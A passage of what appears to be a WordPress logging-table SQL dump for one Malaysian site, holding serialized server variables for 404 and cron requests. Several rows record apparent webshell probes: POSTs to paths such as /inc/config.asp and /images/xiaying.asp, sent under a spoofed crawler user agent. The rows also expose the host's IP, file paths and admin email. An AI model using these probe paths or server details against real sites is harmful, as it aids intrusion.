+http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7aGvKpfhdzjfAsCG1mWwAAARA\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.11\";s:11:\"REMOTE_PORT\";s:5:\"45897\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa7aGvKpfhdzjfAsCG1mWwAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571740186.7991\";s:12:\"REQUEST_TIME\";s:10:\"1571740186\";}}','notice','2019-10-22 10:29:49','2019-10-22 10:29:47',33811224,35603736,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.11'),(28706,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571742357.6549389362335205078125\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571742357.6549389362335205078125\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571742357.6549389362335205078125\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571742357.6549389362335205078125\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"48642\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571742357.6549389362335205078125\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa7ilTbsgZA4pads4ISS8AAAAEg\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7ilTbsgZA4pads4ISS8AAAAEg\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"48642\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa7ilTbsgZA4pads4ISS8AAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571743268.5028\";s:12:\"REQUEST_TIME\";s:10:\"1571743268\";}}','notice','2019-10-22 11:21:17','2019-10-22 11:21:10',35001112,35254416,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571742357.6549389362335205078125',1,0,'103.6.198.69'),(28707,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/teamviewer-2/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7npsf2CQI4cfFpC9BQbAAAAMY\";s:12:\"REDIRECT_URL\";s:14:\"/teamviewer-2/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.10\";s:11:\"REMOTE_PORT\";s:5:\"17386\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:10:\"SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa7npsf2CQI4cfFpC9BQbAAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571743661.5031\";s:12:\"REQUEST_TIME\";s:10:\"1571743661\";}}','notice','2019-10-22 11:28:00','2019-10-22 11:27:45',34196856,36004352,'https://bintara.com.my/teamviewer-2/',1,0,'157.55.39.10'),(28745,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//plug/custom/an.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.20.221.35\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.20.221.35\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/plug/custom/an.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/plug/custom/an.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@na6CYj3S7An3VFFc8QAAAU4\";s:12:\"REDIRECT_URL\";s:19:\"/plug/custom/an.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"62216\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/plug/custom/an.asp\";s:10:\"SCRIPT_URL\";s:19:\"/plug/custom/an.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@na6CYj3S7An3VFFc8QAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798685.2305\";s:12:\"REQUEST_TIME\";s:10:\"1571798685\";}}','notice','2019-10-23 02:44:48','2019-10-23 02:44:45',35346976,37148160,'http://bintara.com.my//plug/custom/an.asp',1,0,'58.20.221.35'),(28746,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.73.39.18\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.73.39.18\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@9a6CYj3S7An3VFFdEQAAAU8\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"64433\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@9a6CYj3S7An3VFFdEQAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798774.1206\";s:12:\"REQUEST_TIME\";s:10:\"1571798774\";}}','notice','2019-10-23 02:46:16','2019-10-23 02:46:14',35271144,37069008,'http://bintara.com.my//inc/config.asp',1,0,'210.73.39.18'),(28747,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//edit/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.30.150.254\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.30.150.254\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/edit/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/edit/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@-a6CYj3S7An3VFFdEwAAAUM\";s:12:\"REDIRECT_URL\";s:15:\"/edit/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"64633\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/edit/index.asp\";s:10:\"SCRIPT_URL\";s:15:\"/edit/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@-a6CYj3S7An3VFFdEwAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798781.5161\";s:12:\"REQUEST_TIME\";s:10:\"1571798781\";}}','notice','2019-10-23 02:46:23','2019-10-23 02:46:21',35340368,37141104,'http://bintara.com.my//edit/index.asp',1,0,'218.30.150.254'),(28748,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//css/img/down.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.112.221.0\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.112.221.0\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/css/img/down.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/css/img/down.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-EeHARMCuuKQiJT-zrQAAANY\";s:12:\"REDIRECT_URL\";s:17:\"/css/img/down.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"65172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/css/img/down.asp\";s:10:\"SCRIPT_URL\";s:17:\"/css/img/down.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-EeHARMCuuKQiJT-zrQAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798801.1838\";s:12:\"REQUEST_TIME\";s:10:\"1571798801\";}}','notice','2019-10-23 02:46:43','2019-10-23 02:46:41',35340800,37143120,'http://bintara.com.my//css/img/down.asp',1,0,'202.112.221.0'),(28749,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//edit/temps/123.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"203.93.174.15\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"203.93.174.15\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/edit/temps/123.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/edit/temps/123.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@-IuHARMCuuKQiJT-zsgAAAMU\";s:12:\"REDIRECT_URL\";s:20:\"/edit/temps/123.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"49296\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/edit/temps/123.aspx\";s:10:\"SCRIPT_URL\";s:20:\"/edit/temps/123.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@-IuHARMCuuKQiJT-zsgAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798818.1998\";s:12:\"REQUEST_TIME\";s:10:\"1571798818\";}}','notice','2019-10-23 02:47:00','2019-10-23 02:46:58',35343408,37151024,'http://bintara.com.my//edit/temps/123.aspx',1,0,'203.93.174.15'),(28750,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//images/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 